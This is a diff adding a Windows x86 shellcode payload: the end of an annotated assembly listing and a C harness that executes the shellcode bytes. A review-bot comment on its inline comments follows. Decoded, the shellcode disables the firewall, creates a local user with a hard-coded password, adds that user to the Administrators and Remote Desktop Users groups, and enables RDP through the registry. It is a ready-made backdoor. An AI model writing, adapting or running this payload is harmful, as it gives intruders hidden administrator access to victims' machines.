+push 0x762f2022 ; v/ " : 762f2022
+push 0x72657672 ; revr : 72657672
+push 0x6553206c ; eS l : 6553206c
+push 0x616e696d ; anim : 616e696d
+push 0x7265545c ; reT\ : 7265545c
+push 0x6c6f7274 ; lort : 6c6f7274
+push 0x6e6f435c ; noC\ : 6e6f435c
+push 0x7465536c ; teSl : 7465536c
+push 0x6f72746e ; ortn : 6f72746e
+push 0x6f43746e ; oCtn : 6f43746e
+push 0x65727275 ; erru : 65727275
+push 0x435c4d45 ; C\ME : 435c4d45
+push 0x54535953 ; TSYS : 54535953
+push 0x5c454e49 ; \ENI : 5c454e49
+push 0x4843414d ; HCAM : 4843414d
+push 0x5f4c4143 ; _LAC : 5f4c4143
+push 0x4f4c5f59 ; OL_Y : 4f4c5f59
+push 0x454b4822 ; EKH" : 454b4822
+push 0x20646461 ; dda : 20646461
+push 0x20676572 ; ger : 20676572
+push esp ; push pointer to string
+mov eax, [ebp-0x28] ; msvcrt.system address
+call eax ; call system
+
+
+######################################################################################
+#include
+#include
+
+char code[] = \
+"\x89\xe5\x83\xec\x30\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x1b"
+"\x8b\x43\x08\x89\x45\xfc\x8b\x58\x3c\x01\xc3\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7"
+"\x89\x7d\xf8\x8b\x4b\x24\x01\xc1\x89\x4d\xf4\x8b\x53\x1c\x01\xc2\x89\x55\xf0\x8b\x53"
+"\x14\x89\x55\xec\xeb\x32\x31\xc0\x8b\x55\xec\x8b\x7d\xf8\x8b\x75\xe8\x31\xc9\xfc\x8b"
+"\x3c\x87\x03\x7d\xfc\x66\x83\xc1\x0f\xf3\xa6\x74\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf4"
+"\x8b\x55\xf0\x66\x8b\x04\x41\x8b\x04\x82\x03\x45\xfc\xc3\x31\xc0\x66\xb8\x73\x73\x50"
+"\x68\x64\x64\x72\x65\x68\x72\x6f\x63\x41\x68\x47\x65\x74\x50\x89\x65\xe8\xe8\xb0\xff"
+"\xff\xff\x89\x45\xe4\x31\xd2\x52\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f"
+"\x61\x64\x54\xff\x75\xfc\x8b\x45\xe4\xff\xd0\x89\x45\xe0\x31\xc0\x66\xb8\x72\x74\x50" 
+"\x68\x6d\x73\x76\x63\x54\x8b\x5d\xe0\xff\xd3\x89\x45\xdc\x31\xd2\x66\xba\x65\x6d\x52"
+"\x68\x73\x79\x73\x74\x54\xff\x75\xdc\x8b\x45\xe4\xff\xd0\x89\x45\xd8\x31\xc9\x66\xb9"
+"\x4c\x45\x51\x68\x49\x53\x41\x42\x68\x64\x65\x3d\x44\x68\x65\x20\x6d\x6f\x68\x70\x6d"
+"\x6f\x64\x68\x65\x74\x20\x6f\x68\x6c\x6c\x20\x73\x68\x72\x65\x77\x61\x68\x68\x20\x66"
+"\x69\x68\x6e\x65\x74\x73\x54\x8b\x45\xd8\xff\xd0\x31\xc9\x51\x68\x2f\x61\x64\x64\x68"
+"\x79\x21\x21\x20\x68\x43\x40\x6e\x64\x68\x72\x6e\x55\x32\x68\x75\x20\x54\x75\x68\x69"
+"\x6e\x42\x75\x68\x20\x4d\x61\x6a\x68\x75\x73\x65\x72\x68\x6e\x65\x74\x20\x54\x8b\x45"
+"\xd8\xff\xd0\x31\xc9\x51\xb9\x90\x61\x64\x64\xc1\xe9\x08\x51\x68\x75\x75\x20\x2f\x68"
+"\x6a\x69\x6e\x42\x68\x73\x20\x4d\x61\x68\x61\x74\x6f\x72\x68\x69\x73\x74\x72\x68\x64"
+"\x6d\x69\x6e\x68\x75\x70\x20\x41\x68\x6c\x67\x72\x6f\x68\x6c\x6f\x63\x61\x68\x6e\x65"
+"\x74\x20\x54\x8b\x45\xd8\xff\xd0\x31\xc9\x51\xb9\x90\x61\x64\x64\xc1\xe9\x08\x51\x68"
+"\x75\x75\x20\x2f\x68\x6a\x69\x6e\x42\x68\x22\x20\x4d\x61\x68\x73\x65\x72\x73\x68\x6f"
+"\x70\x20\x55\x68\x65\x73\x6b\x74\x68\x74\x65\x20\x44\x68\x52\x65\x6d\x6f\x68\x75\x70"
+"\x20\x22\x68\x6c\x67\x72\x6f\x68\x6c\x6f\x63\x61\x68\x6e\x65\x74\x20\x54\x8b\x45\xd8"
+"\xff\xd0\x31\xc9\x51\x68\x30\x20\x2f\x66\x68\x20\x2f\x64\x20\x68\x57\x4f\x52\x44\x68"
+"\x45\x47\x5f\x44\x68\x2f\x74\x20\x52\x68\x6f\x6e\x73\x20\x68\x65\x63\x74\x69\x68\x43"
+"\x6f\x6e\x6e\x68\x6e\x79\x54\x53\x68\x20\x66\x44\x65\x68\x22\x20\x2f\x76\x68\x72\x76"
+"\x65\x72\x68\x6c\x20\x53\x65\x68\x6d\x69\x6e\x61\x68\x5c\x54\x65\x72\x68\x74\x72\x6f"
+"\x6c\x68\x5c\x43\x6f\x6e\x68\x6c\x53\x65\x74\x68\x6e\x74\x72\x6f\x68\x6e\x74\x43\x6f"
+"\x68\x75\x72\x72\x65\x68\x45\x4d\x5c\x43\x68\x53\x59\x53\x54\x68\x49\x4e\x45\x5c\x68"
+"\x4d\x41\x43\x48\x68\x43\x41\x4c\x5f\x68\x59\x5f\x4c\x4f\x68\x22\x48\x4b\x45\x68\x61"
+"\x64\x64\x20\x68\x72\x65\x67\x20\x54\x8b\x45\xd8\xff\xd0";
+
+int main(int argc, char **argv)
+{
+ int (*func)();
+ func = (int(*)()) code;
+ 
(int)(*func)();
+}
\ No newline at end of file
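Review bot: The argument labels on the first GetProcAddress call are swapped: `push esp ; $hModule` actually pushes the pointer to the "LoadLibraryA" string (the lpProcName argument) and `push dword [ebp-0x4] ; $lpProcName` pushes the kernel32.dll base (hModule), which the comments on the later msvcrt lookup get right. The comment `; EAX = WSAStartup Address` after that msvcrt lookup is a stale copy-paste and should read `; EAX = &msvcrt.system`, and `repe cmpsb ; compare first 8 bytes` contradicts the count of 15 set by `add cx, 0xF` on the line above it. Correcting these keeps the annotated listing consistent with the byte array below it; the two `#include` lines have also lost their header names, so the harness as pasted does not state what it depends on.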